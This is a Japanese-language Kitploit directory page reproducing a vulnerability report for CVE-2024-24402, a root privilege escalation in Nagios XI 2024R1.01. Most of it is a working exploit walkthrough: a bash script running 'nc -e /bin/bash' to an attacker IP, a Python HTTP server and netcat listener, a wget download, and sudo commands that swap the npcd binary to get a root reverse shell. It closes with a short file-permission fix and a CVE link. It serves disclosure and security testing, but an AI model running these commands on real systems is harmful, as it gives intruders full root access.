Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-24402 — Nagios 2024R1.01 における権限昇格 | Kitploit
ツール/GitHubGitHub/mawk0235/cve-2024-24402
特権昇格脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテストレッドチーミング
GitHubmawk0235/cve-2024-24402

CVE-2024-24402

Nagios 2024R1.01 における権限昇格

リポジトリを見る
42年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

脆弱性レポート

CVE 発見者: Jarod Jaslow (MAWK)

脆弱性の詳細:

  • エンドポイント: Nagios XI Version 2024R1.01
  • 脆弱性タイプ: ユーザー "NAGIOS" からの権限昇格
  • 悪用結果: ターゲットシステム上での完全な root アクセス

再現手順:

1. Nagios XI バージョン 2024R1.01 の新しいインスタンスを作成する:

  • Nagios XI OVAファイルを次からダウンロード: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
  • OVAをデプロイして新しいインスタンスを作成します。 -以前のレポートを使用してサーバー上でRCEを獲得します。

2. 権限昇格を悪用する:

  • ユーザー "NAGIOS" として、攻撃者マシンに以下の内容のファイルを作成します:

    root@kitploit:~
    #!/bin/bash
    nc -e /bin/bash <Attacker IP> 4445
    

Pasted image 20240118113554

  • Python HTTPサーバーを介して攻撃者マシン上でファイルをホストします:

    root@kitploit:~
    python3 -m http.server 8000
    

Pasted image 20240118173813

  • 攻撃者マシン上でNetcat (NC) リスニングサーバーを起動します:

    root@kitploit:~
    nc -nlvp 4445
    

Pasted image 20240118173831

3. 被害者コンピュータ上で悪用を実行する:

  • 攻撃者マシンからファイルを取得します:

    root@kitploit:~
    wget http://<Attacker IP>:8000/npcd
    

Pasted image 20240118173846

  • 以下のコマンドを実行して権限を昇格させ、rootとして接続を受け取ります:

    root@kitploit:~
    sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
    cp npcd /usr/local/nagios/bin/npcd
    sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
    

Pasted image 20240118173857

Pasted image 20240118173915

推奨事項:

ユーザー "NAGIOS" が root として実行される Nagios サービス実行ファイルに書き込む能力を制限することを推奨します。これは、Nagios サービスに関連するディレクトリとファイルに対して、より厳格なファイル権限とアクセス制御を実装することで達成できます。

これは新しいリリースで修正されるべきです。

CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402

ツールをダウンロード